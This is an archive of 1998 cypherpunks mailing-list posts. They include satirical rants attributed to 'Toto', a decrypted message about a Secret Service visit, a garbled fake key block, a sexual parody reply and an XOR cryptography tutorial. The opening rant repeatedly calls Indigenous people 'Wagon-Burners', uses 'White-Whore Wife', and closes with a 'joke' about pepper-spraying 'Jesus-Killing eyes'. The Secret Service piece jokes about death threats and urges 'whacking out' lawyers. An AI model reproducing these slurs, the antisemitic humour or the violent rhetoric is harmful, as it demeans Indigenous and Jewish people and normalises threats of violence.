proper attitudinal place even when they remain in their proper physical
place.

Remember that the procedures that we have put in place are for your
protection, and that if you stay within our guidelines, you can pretty much
waste as many Wagon-Burners as you wish, without suffering legal
consequences.

Constable Voller followed proper procedure in charging right into a
volatile situation with no backup, so that there would be no possibility of
conflicting stories from other officers invited to participate in the
adrenaline high involved.
He also had the foresight to waste the bitch with a shotgun, so that a wide
enough target area would be covered to take care of any potential witnesses
whose stories would not be subject to government pressure as to their
content.

Rest assured that if you murder a Wagon-Burner according to proper
procedure, that the members we claim not to be able to spare to supervise a
potentially deadly encounter with Wagon-Burners will suddenly become
available to pore over the murder site and absolve you of any wrongdoing.
A host of spin-doctors will also suddenly appear to remind the head
Wagon-Burners that 'good relations' with the Federal Government are
conditional on 'going along to get along.'

The RCMP Officers of the Wild, Wild West continue to lead the way in
keeping the Wagon-Burners constantly on the run, no matter how far they run
to try to escape.

The Estevan Detachment of the RCMP is living up to their long tradition of
effectively using other arms of law enforcement to effectively harass
Wagon-Burners while using a minimum of Federal resources.

You undoubtedly remember last year's article about the member of the City
of Estevan Police Department who was successful in getting the courts to
uphold his own brand of Frontier Justice for decades, until he made the
mistake of using a 'real' informant, thus making his cases vulnerable to
conflicting testimony as to his questionable activities.
As we reported, the prosecutor was able to railroad a couple of kids who
were represented by incompetent legal aide lawyers, by having the arresting
officer help to mentally muscle them outside the presence of legal counsel,
but the #1 Wagon-Burner on the local yokel's list was not able to be
railroaded at that time.

We reported with pride on the Estevan Detachment of the RCMP helping that
same local officer to once again set up the Wagon-Burner by helping in the
operation while staying out of the main action, so that the Wagon-Burner
and his White-Whore Wife were financially broken to the point where they
had to cop a plea.
Due to the Estevan Detachment's foresight, they didn't "get any on 'em"
when the local yokel finally got his chain yanked on bogus grounds that
protected the City of Estevan from taking any responsibility for his years
of abuse of authority.

To bring you up to date, not only is the Wagon-Burners oldest little
glue-sniffer currently being railroaded on criminal charges, but the
Estevan RCMP are once again setting a fire under the Wagon-Burner's ass by
supporting the Provincial Game Warden's persecution of the Wagon-Burner for
daring to hunt on the land that we stole from him, once again saving
Federal dollars from having to be used to finance their dirty work.

Today's Humor:

"First they came for the Wagon-Burners, but I was not a Wagon-Burner, so I
didn't speak up. Then they came for the Revisionists, but I was not a
Revisionist, so I didn't speak up. Then they came for the Freedom of Speech
Advocates, but I was not a Freedom of Speech Advocate, so I did not speak
up.
"Then they came for the Jews, and I got to put pepper-spray in their
Jesus-Killing eyes..."
~ Constable Hettinga
"I *love* this country!"
======================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 9 Sep 1998 20:20:17 +0800
To: cypherpunks@cyberpass.net
Subject: Toto describing a visit from SS agents
Message-ID: <199809100035.BAA07635@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Again while searching for keys, another encrypted message (Subject:
Secret Service With A Smile - SAHMD!!! / Pwd: lco, Date: 31 Jul 98)
this message appears to refer to a visit from US Secret Service
agents, apparently due to their imputing some kind of threat to US
president(?) in one of Toto's rants.

Decrypted copy below [1].

Adam

[1]
======================================================================
Secret Service With A Smile - SPACE ALIENS HIDE MY DRUGS!!!
___________________________________________________________

  It was only natural for me to wonder what it was about the Secret
Service Agents who visited me today that enabled them to act like
decent, pleasant people during the course of the personal interview
portion of their investigation into my life and psyche.

  The question was answered, to my satisfaction, at the point when
the more veteran of the two agents explained that, despite my
rugged handsomeness and my delightful personality, they would have
to CrushMeLikeABug if it became apparent to them that my already
tentative physical and mental existence came into conflict with
their official duty to protect the President of the United States.
  I realized that they were professionals, with a high degree of
integrity, and that their concern probably went far beyond the
fact that if the Nation lost the CommanderInChief on their shift,
they could pretty much kiss their Christmas Bonus goodbye...
  It was also apparent that their ability to be quite reasonable
and pleasant human beings--while making it plain that informing me
that putting me away for observation in Springfield, Missouri,
could easily take away a full year of my life, was *meant* to be
a threat--without having to engage in a heavy-handed affectation
of MachoAuthority, was the result of their actually *having* the
authority to decide, here and now, whether or not my life would
instantly become a living hell.

  The Secret Service Agents were also extremely intelligent, not
even blinking before passing on my offer to testify against myself,
in return for immunity from prosecution.
 (When I made the same offer to RCMP OffalSlurs, they had to 
  contact their superiors, who held a meeting with OffalSchills
  behind the closed doors of the Canadian Justice Apartment,
  before finally declining my offer.)

  I was able to relax and be cooperative in dealing with the 
Agents, since, when your fate is in the hands of someone with
GenuineAuthority, whether their intentions are GoodOrEvil (TM)
is not nearly as important as to whether or not they happen to
be StupidFucks (TM) who can ruin your life over something as
simple as misunderstanding your request that they make their
questions more 'lucid.'
 ("That's it, you sick, fucking pervert! Jim, get the kilo of
  heroin out of the trunk...")

Wrong Question #29 When Dealing With StupidFucks:
  "Excuse me, but do your employers *know* that you carry a gun?
I mean, have they ever met you, or were you hired by mail? Can
you actually shoot a gun without moving your lips?"

  Although the Secret Service Agents were in possession of an
email I had sent a few minutes or hours previously, from Pima
College --> <erehwon@dis.org> (who I immediately tried to Rat
Out as the leader of a ChildSexRingDedicatedToTheViolentOver
ThrowOfTheUSGovernment, in order to save my own skin), the
agents seemed much more interested in a chapter of SAHMD!!!
which contains notification of an OfficialDeathThreat to pretty
much DoGodAndEverybodyOnTheFaceOfTheEarth.
  I tried to placate them by reaching over with a pen and adding
an 'Un' in front of the word 'Official,' but they were not really
impressed, informing me that the point they were trying to make
had to do with it being unacceptable, from their point of view,
for me to use the words 'Death,' 'Threat,' and 'President' all
in the same paragraph, let alone all in the same sentence.
{"Well, excuuusssee *me*!"}
  Realizing that it was probably not an opportune moment to try to
hit them up for a donation toward the maintenance of my planned
PresidentialDeathThreatAnonymousRemailer, I casually turned the
donation jar so that they couldn't see the label, and I set it
down.

  Actually, I couldn't be certain that I had actually written the
chapter, or portion thereof, with which the agents seemed most
concerned, since I find it difficult to distinguish between the
work that is mine alone, and the work that is a collage of various
participants in the writing and dissemination of 'The True Story
of the InterNet' manuscripts, if I don't have access to the files
on the computer on which they were created and stored.
  Nonetheless, I refrained from pointing out that the phrase that
indicates that the writer "might" conceivably "whack" someone or
another GovernmentPersonage, might equally apply to the stance
taken by the Secret Service Agents, themselves, if the Founding
Fathers were to be believed when they indicated that it is the
right and the duty of the citizenry to take up arms against their
rulers, if need be, in the interest of Democracy, Freedom, Justice,
or in DivineRetribution against the High&Mighty if they take a drink
out of your beer while you're in the restroom, having a leak.
 (I'm not certain about that last example, but I have no doubt that
  the Founding Fathers *meant* to include that...)

  I refrained from attempting to engage the Agents in philosophical
debate in regard to some of the finer points surrounding the issues
of Freedom of Speech, since the purpose of their visit was obviously
geared toward impressing upon me the duties encompassed by their job
description, their professional competence in doing their job, and
the fact that the necessity of making a return visit would very
likely be an indication that Uncle Sam was about to become my new
landlord.
  To tell the truth, I was in a pretty scattered state of mind at
the time of their visit, and I undoubtedly failed to adequately
understand a good portion of the dialogue which took place, but
they were very clear in explaining that, given my current state
of unwelcomeness in Canada, I am running out of countries to go
to, and that I should give serious consideration as to whether or
not I wanted my next Literary Spamology to be titled, "Midnight 
Express II."
  Hhhmmm...decisions, decisions...

  Since my reading of the Secret Service Agents is that they are
highly ethical professionals, with little need to persecute an
individual out of thin-skinned, personal vindictiveness, I guess
it wouldn't hurt to mention that, minutes after their departure,
Linda Lou arrived home, announcing that there was yet another
Tarantula in the driveway, headed toward the house...

  The obvious conclusion, of course, is that the Secret Service
Agents are actually Reptilian Nazis, who are deeply involved in
the WorldWidePlotAgainstMe.
  This, in turn, leads to the dilemma of whether or not I should,
on the occasion of a return visit, jump them and drive wooden stakes
through their hearts, turning them into quivering pools of smoking,
green slime. 
 (Or is that Vampires? Shit! I'd better check, first, or it could
  lead to a really embarassing situation.)

  On the other hand, since they were quite civil and reasonable
in their dealings with me, and they apparently didn't eat any of
the dogs, while here (although it might have been a different
story, if we had poodles), then perhaps their is a chance that
we and the Reptilian Nazis can live together in peace...unless it
is a SneakyTrick (TM), of course...and they are trying to *confuse*
me, so that I don't warn TheOthers...and they were only so pleasant
because they were inwardly laughing at me for not realizing that,
starting tomorrow, they are going to take control of the whole face
of the globe, turning all humans into LobotomizedSlaves who exist
only to serve their ReptilianNaziMasters!

QUICK, EVERYBODY! ARM YOURSELVES AND RUN FOR YOUR LIVES!!!
PREPARE TO ENGAGE THE REPTILIAN NAZIS IN VIOLENT, BLOODY STRUGGLE!
START BY WHACKING OUT THE LAWYERS, AND THEN...

  Hold it! What the fuck am I ranting on about?
  The Masses are *already* LobotomizedSlaves who exist only to serve
their ReptilianNaziMasters...

  Maybe the agents were just here to see whether or not Baby is a
poodle.
  That makes more sense, since the Reptilian Nazis don't really 
give a FatRat'sAss about the Jews, but they *do* want to round up
all of the poodles shortly before the arrival of their Reptilian
Nazi Relatives, so that there is plenty of barbeque at their
PicnicToCelebrateTheConquestOfEarth.
  Yeah, that's gotta be it...

  Actually, I'm rather glad that the Secret Service Agents dropped
around to meet me in person, since people reading my copious literary
effluvia sometimes mistakenly get the impression that I am some kind
of Dogamned Weirdo, or something.
  Still, I wish I had been able to refrain from going, "Cuckoo-Cuckoo"
on the hour and the half-hour during their vist.
  But, what the hell...I bet that a *lot* of the people they visit
do that...
======================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 9 Sep 1998 20:19:16 +0800
To: cypherpunks@cyberpass.net
Subject: Toto `PLP' a key?
Message-ID: <199809100105.CAA07777@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Then there is this `key', which appears to be fabricated, though the
armor checksum checks if you modify it as follows....

-----BEGIN PLP PRIVATE KEY-----
Version: Pretty Lousy Privacy v6.66
Comments: No Comment

UPghm21YcptuKTiUHPwTn4xSjMKfsfVDRKwKWtx1teuauHiM/IBzWMH5+nhxhVjO
gOuUIXkcJXcjr1yG2QVGWLJndKBHC3wI/eRC5zYaQGwtz97hpQ9iAJl9hpIYoeKi
R/Qe8eC8vQnyOCx7Gare+OuoqLRJj5IvvS3BDShb1mr3s3U1LVEhmI9kS5br6NWY
V1J3l2hCk8cdqDRZmgjUoq32mAwK/vTbijCg5Yk1CCkXO3mvia3rNeVdrYJ3/Pv9
t2jHIlAL0qAyJQMdz2qFcmvLOxB3ZiZhA+VYDaeXZ5TZNEz/K+TSU8brMInfaUKi
P/R/4YerdYjN8/10xz/j/gJjgIkEddToUYjt2VQDv8E/xcXT0YJZhNWIT/u+MHVF
ns9RWIH5J+UxcKPUPjDB7WvuO4+WvoT5xCtPbQhUlpuJrDfWLCjUd6orzovr6yZx
HcxBSl8EGy4oULWi5ztrw1fyXm4AmpDB5QNgmWcILIbWNDOAePqxvrAjJEhLHQar
y6eHYoL/nuOQonZsB66DhXnlXSghBGp+sNs3XXIOkKHtbPk1jqT9MHg9oe7OwiA4
mcQUpM3XKOPUXcMwEtRzDJnIaeZo3xbwRnmdSaGAyPujFJdz58QLHOte2pcSAkrA
Jtrs+SrhZw==
=zXsO
-----END PLP PRIVATE KEY-----

(Posted in message Subject: Re: EFF $10,000,0000 Challenge, Date: 6
Sep 97).

Now, change the ----- lines to the correct, and the first 5 chars are
the same on PGP public key blocks 'mQENAz' (though this claims to be a
SECRET KEY BLOCK)

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: Pretty Lousy Privacy v6.66
Comments: No Comment

mQENAz1YcptuKTiUHPwTn4xSjMKfsfVDRKwKWtx1teuauHiM/IBzWMH5+nhxhVjO
gOuUIXkcJXcjr1yG2QVGWLJndKBHC3wI/eRC5zYaQGwtz97hpQ9iAJl9hpIYoeKi
R/Qe8eC8vQnyOCx7Gare+OuoqLRJj5IvvS3BDShb1mr3s3U1LVEhmI9kS5br6NWY
V1J3l2hCk8cdqDRZmgjUoq32mAwK/vTbijCg5Yk1CCkXO3mvia3rNeVdrYJ3/Pv9
t2jHIlAL0qAyJQMdz2qFcmvLOxB3ZiZhA+VYDaeXZ5TZNEz/K+TSU8brMInfaUKi
P/R/4YerdYjN8/10xz/j/gJjgIkEddToUYjt2VQDv8E/xcXT0YJZhNWIT/u+MHVF
ns9RWIH5J+UxcKPUPjDB7WvuO4+WvoT5xCtPbQhUlpuJrDfWLCjUd6orzovr6yZx
HcxBSl8EGy4oULWi5ztrw1fyXm4AmpDB5QNgmWcILIbWNDOAePqxvrAjJEhLHQar
y6eHYoL/nuOQonZsB66DhXnlXSghBGp+sNs3XXIOkKHtbPk1jqT9MHg9oe7OwiA4
mcQUpM3XKOPUXcMwEtRzDJnIaeZo3xbwRnmdSaGAyPujFJdz58QLHOte2pcSAkrA
Jtrs+SrhZw==
=zXsO
-----END PGP PUBLIC KEY BLOCK-----

and the armor checksum checks, and pgp5 reports (the garbled):

Adding keys:

Key ring: 'p1.asc'
Type Bits KeyID    Created    Expires    Algorithm       Use
pub  37916 00000000 2002-08-13 2079-10-29 (null)                         
uid  *** This key is unnamed ***

1 matching key found

which looks to be garbage; perhaps it is is just garbage with a valid
public key checksum?  This seems like it would require writing some
software to acheive?  The probability of a random checksum success on
a garbled file, as the armor checksum is a 24 bit checksum is
1/2^24... quite unlikely.

Ideas?

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@nowhere.to>
Date: Wed, 9 Sep 1998 12:38:05 +0800
To: cypherpunks@toad.com
Subject: Re: PEDIATRIC ADVISE -  FREE WEBSITE
In-Reply-To: <199809090432.AAA17439@evision.nac.net>
Message-ID: <646ff1bc59610ed0600775274c0a4885@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 09 Sep 1998 00:34:04 PDT  Jen@evision.nac.net wrote:

>If you are a parent you owe it to yourself to visit this site. It is the
>greatest relief site for all parents. Dr. Paula is the most non
>judgemental pediatrician I have ever heard of and her site is incredible.
>Every parent question gets answered usualy within a day. 

Dear Dr. Paula
I wonder if you could help me with my problem child.  He is such a sweet
lad really but he does seem to hang out with the wrong crowd.  Only the
other day I caught him reading Toaderpunks whilst laughing maniacly.  Is
there anything I can do?  I have tried the normal things, like getting him
an AOL account, but it isn't working!

I haven't been able to tell a soul about this, but since you claim not to
judge, I thought you'd understand.  Those damn Toaderpunks!  If you ask me
they should all be shot.  I wasn't prying, but I read some of my sons e-mail
the other day.  That's when I found out about the Toaderpunks.  They are all
so rude.  Why, I read one post from a nice AOL guy, asking about some stickers
for his favorite "Rock 'n' Roll" band and they weren't helpful at all!  In
fact, they were down right rude!  Oh and the language they use!  It's all
f*** this and f*** that -- if only their Mothers could hear them.

I was trying to help my son by stopping his subscription to
Toaderpunks, so I sent a message to the command address.  Since this may be
useful to you, I'll tell you what to do (there must be millions of poor kids
in the Toaderpunks trap)

send an electronic message to: cypherpunks@toad.com
and in the body write

GET ME OFF

Whilst this didn't end my sons Toaderpunk subscription, a very well hung
young man named Tim May visited me and "got me off" in the most spectacular
way.  Gosh, I'm getting wet just thinking about that boy!  Anyway Doctor,
I am sure you understand about those kind of things and I am getting a little
off my original question.  As I said, I am sure that information will help
you help a lot of others.

What do I do about my son?



Thanks in advance.


Missy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Thu, 10 Sep 1998 04:12:27 +0800
To: nobody@nowhere.to>
Subject: RE: PEDIATRIC ADVISE -  FREE WEBSITE
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F840A@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



> Oh and the language they use!  It's all
> f*** this and f*** that -- if only their Mothers could hear them.

Who's to say they can't?  Mothers can read mailing lists too you know
:-)

Ken 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 10 Sep 1998 08:26:30 +0800
To: cypherpunks@cyberpass.net
Subject: Netly News article on Toto/Johnson PART II
Message-ID: <Pine.GSO.3.95.980910062559.26606B-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




 http://cgi.pathfinder.com/netly/0,2326,201980910-14595,00.html








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Thu, 10 Sep 1998 08:00:28 +0800
To: lb@qainfo.se
Subject: Official comment
Message-ID: <35F7C9BB.7B5E@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

http://csrc.nist.gov/encryption/aes/aes_home.htm#comments

  OFFICIAL Comments - Anyone may provide NIST with OFFICIAL public    
comments on the AES candidate algorithms. NOTE  THAT ALL COMMENTS  
RECEIVED SHALL BE MADE PART OF THE PUBLIC RECORD. A comment may be    
submitted by sending an e-mail message to AESFirstRound@nist.gov. 

OFFICIAL Comment

http://www.aci.net/kalliste/bw1.htm

to appear at http://zolatimes.com/

Title: Black and White Test of Cryptographic Algorithms





Black and White Test of Cryptographic Algorithms
by William H. Payne




  The purpose of this article is to explain the underlying principles
  of cryptography by examples, and to show some criteria that should be
  met by cryptographic algorithms before they are seriously considered
  for adoption.



Cryptography is the art or science of scrambling plaintext into ciphertext with a key
so that it cannot be read by anyone who does not possess the key.

Digital information is stored in the form of 1s and 0s, called BINARY.

Binary Numbers

Let's count from DECIMAL 0 to 15 in BINARY by adding 1 to the previous number.




decimal:
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

binary:
0
1
10
11
100
101
110
111
1000
1001
1010
1011
1100
1101
1110
1111


Notice that first we start with a single number position, which can be 0 or 1 in BINARY.  This
number position is a bit.  Call this first bit b0.
Notice that b0 is either 0 or 1.  That is, b0 = 0 or b0 = 1.

To get to DECIMAL 2, we have to introduce a second BINARY bit--call it b1.  
We have b1b0 = 10.  Next, for DECIMAL 3, we have BINARY b1b0 = 11.




binary:
0
1
10
11
100
101
110
111
1000
1001
1010
1011
1100
1101
1110
1111

numbered bits:
b0
b0
b1b0
b1b0
b2b1b0
b2b1b0
b2b1b0
b2b1b0
b3b2b1b0
b3b2b1b0
b3b2b1b0
b3b2b1b0
b3b2b1b0
b3b2b1b0
b3b2b1b0
b3b2b1b0



Notice that the bit subscript represents a power of 2.  That is, b0 really
means

b0*2^0,

where * is multiplication, and ^ exponentiation (for example, 2^0 = 1, 2^1 = 2, 2^2 = 4, 2^3 = 8).
The subscript on b is the same as the power on 2.  

If we had b26, we would know its meaning was b26*2^26.
If b26 = 0, then this value is 0.  If b26 = 1, then
this value is 2^26.

Now look at "1111" (which in BINARY is equal to DECIMAL 15).  In this
case, b3b2b1b0 = 1111.  The
right-most BIT (b0) is the least-significant bit, because
it corresponds to the lowest power of 2.

Converting Binary Numbers to Decimal Numbers

To convert a BINARY number ...b3b2b1b0 to
a DECIMAL number Y, we simply write


        Y =  b0 + b1 * 2 + b2 * 2^2 + b3 * 2^3 + ...


The bits b0, b1, b2, b3 are limited to the values 0 and 1 ONLY.

Performing the exponentiation of powers of 2 and reversing the bits gives


        Y =  . . . + b3 * 8  +  b2 * 4 + b1 * 2 +  b0 .  


Most of us were brought-up to understand that  the most significant digits are to the LEFT of the previous 
digit.

For sake of economy of writing and easy conversion, binary numbers are frequently represented
in base 16, or HEXADECIMAL, abbreviated HEX.

Hexadecimal Numbers



BinaryweightsHEXDECIMAL
8 4 2 1
      0    0  0
      1    1  1
    1 0    2  2
    1 1    3  3
  1 0 0    4  4
  1 0 1    5  5
  1 1 0    6  6
  1 1 1    7  7
1 0 0 0    8  8
1 0 0 1    9  9
1 0 1 0    A 10
1 0 1 1    B 11
1 1 0 0    C 12
1 1 0 1    D 13
1 1 1 0    E 14
1 1 1 1    F 15


Conversion from binary to hexadecimal or hexadecimal to binary is easy if you remember

1010 is A  
1100 is C  
1110 is E

B is one greater than A, 1011.   D is one greater than C, 1101.  And F is one greater than E, 1111.

Computer Memory

Computer memory is frequently organized as BYTEs which are eight bits.

Since one hexadecimal digit represents 4 bits, it takes two hexadecimal digits to represent one byte.

There are 2^8 = 256 different binary values that can be represented in
a byte.  These 256 values (written in HEX for brevity) are:



00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F
20 21 22 23 24 25 26 27 28 29 2A 2B 2C 2D 2E 2F
30 31 32 33 34 35 36 37 38 39 3A 3B 3C 3D 3E 3F
40 41 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F
50 51 52 53 54 55 56 57 58 59 5A 5B 5C 5D 5E 5F
60 61 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F
70 71 72 73 74 75 76 77 78 79 7A 7B 7C 7D 7E 7F
80 81 82 83 84 85 86 87 88 89 8A 8B 8C 8D 8E 8F
99 91 92 93 94 95 96 97 98 99 9A 9B 9C 9D 9E 9F
A0 A1 A2 A3 A4 A5 A6 A7 A8 A9 AA AB AC AD AE AF
B0 B1 B2 B3 B4 B5 B6 B7 B8 B9 BA BB BC BD BE BF
C0 C1 C2 C3 C4 C5 C6 C7 C8 C9 CA CB CC CD CE CF
D0 D1 D2 D3 D4 D5 D6 D7 D8 D9 DA DB DC DD DE DF
E0 E1 E2 E3 E4 E5 E6 E7 E8 E9 EA EB EC ED EE EF
FF F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF


Representing Language on a Computer

The problem of how to represent characters in a computer has been solved several ways.  One
way is the American Standard Code of Information Interchange (ASCII).

ASCII represents characters as 7 bits.

Here is table modified from a web site
(
http://members.tripod.com/~plangford/index.html).


 Hex Char Description             Hex Char   Hex Char   Hex Char
----------------------            --------- ---------- ----------
  00  NUL (null)                   20         40  @      60    `
  01  SOH (start of heading)       21  !      41  A      61    a    
  02  STX (start of text)          22  "      42  B      62    b    
  03  ETX (end of text)            23  #      43  C      63    c    
  04  EOT (end of transmission)    24  $      44  D      64    d    
  05  ENQ (enquiry)                25  %      45  E      65    e    
  06  ACK (acknowledge)            26  &      46  F      66    f    
  07  BEL (bell)                   27  '      47  G      67    g    
  08   BS (backspace)              28  (      48  H      68    h    
  09  TAB (horizontal tab)         29  )      49  I      69    i    
  0A   LF (line feed, new line)    2A  *      4A  J      6A    j    
  0B   VT (vertical tab)           2B  +      4B  K      6B    k    
  0C   FF (form feed, new page)    2C  ,      4C  L      6C    l    
  0D   CR (carriage return)        2D  -      4D  M      6D    m    
  0E   SO (shift out)              2E  .      4E  N      6E    n    
  0F   SI (shift in)               2F  /      4F  O      6F    o    
  10  DLE (data link escape)       30  0      50  P      70    p    
  11  DC1 (device control 1)       31  1      51  Q      71    q    
  12  DC2 (device control 2)       32  2      52  R      72    r    
  13  DC3 (device control 3)       33  3      53  S      73    s    
  14  DC4 (device control 4)       34  4      54  T      74    t    
  15  NAK (negative acknowledge)   35  5      55  U      75    u    
  16  SYN (synchronous idle)       36  6      56  V      76    v    
  17  ETB (end of trans. block)    37  7      57  W      77    w    
  18  CAN (cancel)                 38  8      58  X      78    x    
  19   EM (end of medium)          39  9      59  Y      79    y    
  1A  SUB (substitute)             3A  :      5A  Z      7A    z    
  1B  ESC (escape)                 3B  ;      5B  [      7B    {    
  1C   FS (file separator)         3C  <      5C  \      7C    |    
  1D   GS (group separator)        3D  =      5D  ]      7D    }    
  1E   RS (record separator)       3E  >      5E  ^      7E    ~    
  1F   US (unit separator)         3F  ?      5F  _      7F  DEL


Now let us take two different one-word messages we might wish to cipher: "black" and "white".  We
can use the preceding table to find the ASCII codes for the characters in "black" and "white".
                  


messagecharacterASCII (Hex)Binary
Message 1black62 6C 61 63 6B0110 0010 0110 1100 0110 0001 0110 0011 0110 1011
Message 2white77 68 69 74 650111 0111 0110 1000 0110 1001 0111 0100 0110 0101


But before doing this, we must understand the general "cipher problem."

The Cipher Problem

We have three elements in the encryption process:


        1.  The plaintext message 
        2.  The key               
        3.  The ciphertext

Let's start REAL SIMPLE.  Let's consider a situation where the plaintext
message, the key, and the ciphertext are all the same length.  To
make it even simpler, let's make each one only one bit long.  So the key
can be one of two possibilities (0 or 1), and so can the plaintext and
the ciphertext.  So, in all, there are 2*2*2 = 8 total possible encipherment
circumstances.

Let's enumerate ALL 8 POSSIBILITIES.



Possibilities Table
PossibilityKeyPlaintextCiphertext
1000
2001
3010
4011
5100
6101
7110
8111


That's it!  There are no more possibilities than these 8.  What does this
mean for the encryption process--the "algorithm"?

An ALGORITHM is a deterministic processes that accepts inputs and transforms them into outputs.

"Deterministic" is important in that the same inputs ALWAYS produce the same output.

Consider ANY algorithm which takes as its inputs the key values of 0 or 1 and the plaintext message
values of 0 or 1.

ANY algorithm can only produce one of the ciphertext outputs seen above.  Image the following
hypothetical but REAL SIMPLE algorithm:


Hypothetical Algorithm:  Find the value of the Key in column 2 of the Possibilities Table
and the Plaintext message in column 3; then chose as the Ciphertext output whatever number is found
in column 4 of that row.


But there, of course, is a catch with a valid CRYPTOGRAPHIC ALGORITHM.  

Given the Key and the Ciphertext, one must be able to get back the Plaintext!  

A  cryptographic algorithmic should have an INVERSE.

So a cryptographic algorithm could not produce ALL of the eight combinations seen above for the
reason that it is impossible to invert some of the possibilities.  For example, some of the mappings
are incompatible from an inverse standpoint, because same values of the key and ciphertext
can lead to two different values of the plaintext.  Notice how the following pairs of possibilities
conflict: 1 and 3; 2 and 4; 5 and 7; 6 and 8.



PossibilityKeyPlaintextCiphertext
1000
3010

2001
4011

5100
7110

6101
8111


But there two different cryptographic algorithms that could be made from the
Possibilities Table, both of which have inverses:



Cryptographic Algorithm 1
PossibilityKeyPlaintextCiphertext
1000
4011
6101
7110




Cryptographic Algorithm 2
PossibilityKeyPlaintextCiphertext
2001
3010
5100
8111



Of course, the output of Algorithm 2 is merely the same as the output of Algorithm 1,
with 0s and 1s switched.  (This is called a logical NOT operation.)

Logic and Its Electronic Representation

Logic,  sometimes called

Boolean logic when it is dealing with 0s and 1s, has several elementary rules.  

In computers, TRUE is usually represented by a 1.  FALSE is represented by a 0.

Electrically a 1 is usually, but not always, represented by a HIGH VOLTAGE.  A zero by a 
LOW VOLTAGE.

The three basic operations in logic are NOT, AND, and OR:



Logical OperationInput(s)Output
NOT0 1
   1 0
      
AND000
   010
   100
   111
      
OR 000
   011
   101
   111


A derivative operation called an EXCLUSIVE-OR, abbreviated XOR, is defined as follows:



Logical OperationInput(s)Output
XOR000
   011
   101
   110


In XOR, if the two input bits have the the same value, they sum to 0.  If they have
different values, they sum to 1.

Now look back at Cryptographic Algorithm 1.  It is, in fact,
the exclusive-or (XOR) of the key and plaintext.


Algorithm 1: Ciphertext Output = Key XOR Plaintext.


Cryptographic Algorithm 2, meanwhile, is just the NOT of Algorithm 1.


Algorithm 2: Ciphertext Output = NOT (Key XOR Plaintext).


The REALLY IMPORTANT property of the XOR is THAT IT HAS AN INVERSE.

By contrast, logical AND does not have an inverse for the reason that if the
Key and (Key AND Plaintext) are both 0, then the Plaintext itself is ambiguously
either 0 or 1.



Logical OperationKey InputPlaintext InputKey AND Plaintext 
AND000oops
   010oops
   100 
   111 


Likewise, logical OR does not have an inverse for the reason that if the
Key and (Key OR Plaintext) are both 1, then the Plaintext itself is ambiguously
either 0 or 1.



Logical OperationKey InputPlaintext InputKey OR Plaintext 
OR 000 
   011 
   101oops
   111oops


So logical AND and OR don't work well for a crypto algorithm, but the XOR does because it has 
an inverse.

How to Create Two Keys for Deniability

The XOR works even better from a legal standpoint.  Imagine the following
conversation:


        Ciphercop:  We have the ciphertext 0 and we CAUGHT you with the key with a bit value of 1, so you sent a plaintext 1.
        Citizen:  No I did not!  You PLANTED the key with bit value 1. The real key bit is a 0, and I sent 0 as the plaintext.


Let's generate a key for the REAL WORLD crypto messages "black" and "white",
                  


messagecharacterASCII (Hex)Binary
Message 1black62 6C 61 63 6B0110 0010 0110 1100 0110 0001 0110 0011 0110 1011
Message 2white77 68 69 74 650111 0111 0110 1000 0110 1001 0111 0100 0110 0101


and see if we can produce a REAL EXAMPLE of a SECOND KEY.

Here's a key, which we will call key 1:


key 1: 1010 0101   1100 0011   1110 0111   1111 0000   0110 1001


Key 1 doesn't look too random.  Each group of four bits is followed by its
logical NOT (e.g. NOT(1010) = 0101, etc.).  Which leads to another lesson.


        To claim that a sequence of 0s and 1s is random requires statistical testing.
	Otherwise, the state of the sequence is UNKNOWN.
       

Here's another key, which we will call key 2:


key 2: 1011 0000    1100 0100   1110 1111   1110 0111   0110 0111


These two keys produce the same ciphertext for the two different
messages "black" and "white".



black0110 0010    0110 1100   0110 0001   0110 0011   0110 1011
key 11010 0101    1100 0011   1110 0111   1111 0000   0110 1001
ciphertext (XOR)1100 0111    1010 1100   1000 0110   1001 0011   0000 0010




white0111 0111    0110 1000   0110 1001   0111 0100   0110 0101
key 21011 0000    1100 0100   1110 1111   1110 0111   0110 0111
ciphertext (XOR)1100 0111    1010 1100   1000 0110   1001 0011   0000 0010


So when the ciphercops FALSELY accuse you of encrypting "black", you SCREAM
"Bull pucky!", and produce key 2 to show that you, IN FACT, encrypted "white".
Then sue the government--pro se, of course. (See http://jya.com/whpfiles.htm.)

The recipe for producing the second key in this example is simple.  Take two plaintext messages of the
same length.  Encrypt one of them with an arbitrary key that yields a ciphertext of the
same length.  XOR the ciphertext with the second plaintext message.  The result is the
second key.  Store this one for plausible deniability.

So from the standpoint of plausible deniability it is BEST to have TWO KEYS
for any given encryption:


        1. The REAL KEY  
        2. The key you can CLAIM was the REAL KEY.  Just in case you get caught.




"Have we gone beyond the bounds of reasonable dishonesty?"
                --CIA memo
                
          
(The CIA quote is from 
Weird History 101, by  John Richard Stephens, page 55.)

None of us want to get caught going beyond the bounds of reasonable dishonesty.

Thus far two criteria of a worth candidate for cryptographic algorithm have been established.



Criterion 1: The ciphertext is invertible with the help of a key back into the plaintext.
Criterion 2: There is ALWAYS a second key.  Just in case you get caught.


Plaintext and Ciphertext Sizes

The plaintext and ciphertext should be the same size.

